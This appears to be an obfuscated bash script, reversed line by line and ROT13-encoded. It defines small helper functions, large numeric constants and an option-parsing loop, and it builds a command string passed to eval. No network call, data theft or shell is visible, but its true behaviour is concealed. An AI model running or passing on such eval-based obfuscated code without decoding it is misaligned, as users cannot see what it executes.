*$ z

vs
8 gvkr    
"abvgcb tabej" bupr    
arug ;]] 9 dr- ZHAGCB$ [[ sv

)) 8 - QAVGCB$ (($ gsvuf

rabq
pnfr    
;;:    	
)) ++ZHAGCB ((    	
)r	
;;)) 8- =* PP ((    	
)) ++ZHAGCB ((    	
)q	
av gcb$ rfnp    
bq ;gcb "rq" fgcbgrt ryvuj

}
fre$ bupr    
rabq    
q$fre$=fre	
}8:)) }P#{$ % )PP$+k$( (($:P{$=q	
)P$ p$ kqv($=k	
}8:v:f{$=p	
bq ;))++v ;}f#{$<v ;7=v(( ebs    
fre ynpby    
8$=f ynpby    
{ )(z
>egf< z ##

)P$ s($=P
")' ' q- eg | }78..8{P$\ bupr($=P" ynir
))  744 + 9UGNB *    710085851(($=78P
))  360 + 9UGNB * 546363644868 (($=6P
)) 4778 + 9UGNB * 273136504701 (($=5P
))  735 + 9UGNB * 096825372578 (($=4P
)) 8288 + 9UGNB * 389563020669 (($=3P
)) 4228 + 8UGNB * 067944075030 (($=2P
)) 2418 + 8UGNB *   2680750933 (($=1P
))  606 + 8UGNB * 662206175710 (($=0P
))  331 + 8UGNB *  06277276050 (($=9P
)) 9608 + 8UGNB *  00550582691 (($=8P
9=9UGNB
8=8UGNB
7=PP

}
fre$ bupr    
rabq    
vs	
xnreo    	
v$=fre    	
arug ;]] p$ = }8:v:f{$ [[ sv	
bq ;))++v ;}f#{$<v ;7=v(( ebs    
fre ynpby    
9$=f ynpby    
8$=p ynpby    
{ )(kqv
>tavegf< >enup< kqv ##

}
fre$ bupr    
rabq    
vs	
9=+v gry    	
)}9:v:P{$ p($}fre{$=fre    	
rfyr	
0=+v gry    	
)}0:v:P{$ p($}fre{$=fre    	
arug ;]] 51 gy- }9:v:P{$ [[ sv	
bq ;]] }P#{$ gy- v$ [[ ryvuj    
fre ynpby    
7=v ynpby    
8$=P ynpby    
{ )(s
>P< s ##

}
"8$'" 'q%' sgavec    
{ )(b

}
)8$ 'b07%' sgavec($\\ sgavec    
{ )(p

bnuanhe :ebughn #
